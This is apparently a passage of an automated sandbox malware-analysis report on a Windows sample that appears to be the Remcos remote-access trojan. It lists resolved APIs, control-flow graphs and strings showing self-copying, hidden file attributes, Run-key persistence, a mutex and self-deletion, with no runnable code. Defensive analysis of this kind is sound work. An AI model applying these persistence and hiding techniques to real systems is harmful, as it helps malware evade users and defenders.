                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE26
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE29
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE4B
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE4E
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE70
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE73
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                                                                                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                                                                                              • API String ID: 384173800-625181639
                                                                                                                                                                                              • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                                                                                                              • Instruction ID: 9dbe04c74af77a7e1246f7e7b4568b240d3cb110e698a9ec5713b860520f9e80
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                                                                                                              • Instruction Fuzzy Hash: EC31EEA0E4031C7ADA107FB69C49E5B7E9CD940B953110827B508D3162FB7DA980DEEE
                                                                                                                                                                                              Function 0040D767 Relevance: 93.5, APIs: 12, Strings: 41, Instructions: 799COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 5 40d767-40d7e9 call 41bcf3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afd3 call 40e8bd call 401d8c call 43e830 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d941 call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 49 40dc96-40dca7 call 401eea 23->49 79 40d9a5-40d9ac call 40bed7 69->79 80 40d96d-40d98c call 401e8f call 4124b7 69->80 97 40d946-40d94a 70->97 88 40d9b5-40d9bc 79->88 89 40d9ae-40d9b0 79->89 80->79 99 40d98e-40d9a4 call 401e8f call 412902 80->99 93 40d9c0-40d9cc call 41a473 88->93 94 40d9be 88->94 92 40dc95 89->92 92->49 104 40d9d5-40d9d9 93->104 105 40d9ce-40d9d0 93->105 94->93 97->69 100 40e134-40e154 call 401e8f call 412902 call 4112b5 97->100 99->79 108 40da18-40da2b call 401d64 call 401e8f 104->108 109 40d9db call 40697b 104->109 105->104 127 40da32-40daba call 401d64 call 41ae18 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 108->127 128 40da2d call 4069ba 108->128 117 40d9e0-40d9e2 109->117 120 40d9e4-40d9e9 call 40699d call 4064d0 117->120 121 40d9ee-40da01 call 401d64 call 401e8f 117->121 120->121 121->108 138 40da03-40da09 121->138 163 40db22-40db26 127->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a621 127->164 128->127 138->108 140 40da0b-40da11 138->140 140->108 142 40da13 call 4064d0 140->142 142->108 165 40dcaa-40dd01 call 436060 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->165 166 40db2c-40db33 163->166 164->163 189 40dad7-40db03 call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e 164->189 220 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5f7 165->220 169 40dbb1-40dbbb call 4082d7 166->169 170 40db35-40dba7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 166->170 179 40dbc0-40dbe4 call 4022f8 call 4338d8 169->179 259 40dbac-40dbaf 170->259 197 40dbf3 179->197 198 40dbe6-40dbf1 call 436060 179->198 234 40db08-40db1d call 401e18 call 401e13 189->234 203 40dbf5-40dc6a call 401e07 call 43e359 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 call 4338e1 call 401d64 call 40b125 197->203 198->203 203->220 274 40dc70-40dc91 call 401d64 call 41ae18 call 40e219 203->274 272 40dd79-40dd7b 220->272 273 40dd5e 220->273 234->163 259->179 276 40dd81 272->276 277 40dd7d-40dd7f 272->277 275 40dd60-40dd77 call 41bec0 CreateThread 273->275 274->220 292 40dc93 274->292 280 40dd87-40de66 call 401f66 * 2 call 41a696 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5f7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->280 276->280 277->275 330 40dea1 280->330 331 40de68-40de9f call 43361d call 401d64 call 401e8f CreateThread 280->331 292->92 332 40dea3-40debb call 401d64 call 401e8f 330->332 331->332 342 40def9-40df0c call 401d64 call 401e8f 332->342 343 40debd-40def4 call 43361d call 401d64 call 401e8f CreateThread 332->343 353 40df6c-40df7f call 401d64 call 401e8f 342->353 354 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 342->354 343->342 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5f7 call 40b95c 353->365 366 40dfba-40dfde call 41a7b2 call 401e18 call 401e13 353->366 354->353 365->366 386 40dfe0 366->386 387 40dfe3-40dff6 CreateThread 366->387 386->387 390 40e004-40e00b 387->390 391 40dff8-40e002 CreateThread 387->391 395 40e019-40e020 390->395 396 40e00d-40e017 CreateThread 390->396 391->390 398 40e022-40e025 395->398 399 40e033-40e038 395->399 396->395 401 40e073-40e08e call 401e8f call 41246e 398->401 402 40e027-40e031 398->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a696 call 401eea 399->404 413 40e094-40e0d4 call 41ae18 call 401e07 call 412584 call 401e13 call 401e07 401->413 414 40e12a-40e12f call 40cbac call 413fd4 401->414 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 413->433 414->100 434 40e0f4-40e125 call 41ae18 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->414 435->434 437 40e0db-40e0e8 Sleep call 401e07 435->437 437->433
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                                                                                                                                                                                                • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                                                                                                                                                                                                • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                                                                                                                                                                                                • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                                                                                                                • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                                                                                                                                                                                                • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                                                                                                                                                                                                • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\4XYAW8PbZH.exe,00000104), ref: 0040D790
                                                                                                                                                                                                • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                                                                                              • String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Users\user\Desktop\4XYAW8PbZH.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                                                                                                                                              • API String ID: 2830904901-985225076
                                                                                                                                                                                              • Opcode ID: 639fc98fedbc16fab387638ab5a2c649c2c3843ca71600449f4dc7e2ce9c852b
                                                                                                                                                                                              • Instruction ID: 3e021a1a4b13f59cbd2257f1e4af8b1458c06fff599f70b9144805750af3581d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 639fc98fedbc16fab387638ab5a2c649c2c3843ca71600449f4dc7e2ce9c852b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 31329260B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E
                                                                                                                                                                                              Function 0040BC67 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 203fileCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0040BC75
                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                                                                                                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\4XYAW8PbZH.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0040BD54
                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                                                                                                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\4XYAW8PbZH.exe,00000000,00000000), ref: 0040BDF2
                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0040BE34
                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040BED0
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                                                                                                              • String ID: 6$C:\Users\user\Desktop\4XYAW8PbZH.exe$del$open$BG$BG
                                                                                                                                                                                              • API String ID: 1579085052-1351567777
                                                                                                                                                                                              • Opcode ID: f33fe05bea55441c491c63f8bba3e77330e3bc916226144ae537057c72fca099
                                                                                                                                                                                              • Instruction ID: 2f106158a8217a69bc194f5c9bf89c81f007fa4859a00edafeef48886470f02c
                                                                                                                                                                                              • Opcode Fuzzy Hash: f33fe05bea55441c491c63f8bba3e77330e3bc916226144ae537057c72fca099
                                                                                                                                                                                              • Instruction Fuzzy Hash: DC51B1212082006BD609B722EC52E7F77999F81719F10443FF985A66E2DF3CAD4582EE
                                                                                                                                                                                              Function 0040C89E Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: LongNamePath
                                                                                                                                                                                              • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                                                                                              • API String ID: 82841172-425784914
                                                                                                                                                                                              • Opcode ID: 8a32bfeeafc5adc396a0c99bd34a7f668c86cb88242ad76930939258757ea5bd
                                                                                                                                                                                              • Instruction ID: a37aa742da7f535015bd00beacd4484d13b2c9c5bc690283ee024c69455bfc47
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8a32bfeeafc5adc396a0c99bd34a7f668c86cb88242ad76930939258757ea5bd
                                                                                                                                                                                              • Instruction Fuzzy Hash: 68413A721442009AC214F721DD97DAFB7A4AE90759F10063FB546720E2FE7CAA49C69F
                                                                                                                                                                                              Function 0041A473 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 59COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                                                                                                                                                                • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                                                                                • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                                                                                • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                                                                                              • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4E9
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseCurrentOpenProcessQueryValue
                                                                                                                                                                                              • String ID: (32 bit)$ (64 bit)$0JG$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                              • API String ID: 1866151309-3211212173
                                                                                                                                                                                              • Opcode ID: 0d130baeef4d248f6aaf17f7a7f34160bc2b9333c7d8d43989ef401e97546420
                                                                                                                                                                                              • Instruction ID: ceb3f8158c83cee62a9ab3acf094014ca2543c25b31c887bfc35cbf025930a6e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d130baeef4d248f6aaf17f7a7f34160bc2b9333c7d8d43989ef401e97546420
                                                                                                                                                                                              • Instruction Fuzzy Hash: F611CAA050020566C704B765DC9BDBF765ADB90304F40453FB506E31D2EB6C8E8583EE
                                                                                                                                                                                              Function 00446F53 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 652 446f53-446f6a GetLastError 653 446f6c-446f76 call 447476 652->653 654 446f78-446f7f call 448716 652->654 653->654 659 446fc9-446fd0 SetLastError 653->659 658 446f84-446f8a 654->658 660 446f95-446fa3 call 4474cc 658->660 661 446f8c 658->661 663 446fd2-446fd7 659->663 667 446fa5-446fa6 660->667 668 446fa8-446fbe call 446d41 call 446ad5 660->668 664 446f8d-446f93 call 446ad5 661->664 670 446fc0-446fc7 SetLastError 664->670 667->664 668->659 668->670 670->663
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,0043A7D2,00000000,?,?,0043A856,00000000,00000000,00000000,00000000,00000000,00000000,00402C08,?), ref: 00446F58
                                                                                                                                                                                              • _free.LIBCMT ref: 00446F8D
                                                                                                                                                                                              • _free.LIBCMT ref: 00446FB4
                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 00446FC1
                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 00446FCA
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$_free
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3170660625-0
                                                                                                                                                                                              • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                                                                                                              • Instruction ID: 63179894ab579f9662c65df04eda1c4e2cfad31ee62bae45dd706db9c2735e37
                                                                                                                                                                                              • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F01D67620C7006BF61227757C85D2B1669EBC3776727013FF859A2292EE6CCC0A415F
                                                                                                                                                                                              Function 00412774 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 675 412774-412787 RegCreateKeyW 676 4127c6 675->676 677 412789-4127c4 call 4022f8 call 401e07 RegSetValueExW RegCloseKey 675->677 678 4127c8-4127d4 call 401e13 676->678 677->678
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041277F
                                                                                                                                                                                              • RegSetValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004742E0,74DF37E0,?), ref: 004127AD
                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004742E0,74DF37E0,?,?,?,?,?,0040BE18,?,00000000), ref: 004127B8
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041277D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseCreateValue
                                                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                                                                                              • API String ID: 1818849710-1051519024
                                                                                                                                                                                              • Opcode ID: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                                                                                                                                                              • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                                                                                                                                              • Opcode Fuzzy Hash: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                                                                                                                                              Function 0040BED7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 685 40bed7-40bf03 call 401e8f CreateMutexA GetLastError
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040BEF1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateErrorLastMutex
                                                                                                                                                                                              • String ID: (CG
                                                                                                                                                                                              • API String ID: 1925916568-4210230975
                                                                                                                                                                                              • Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                                                                                                                                                              • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
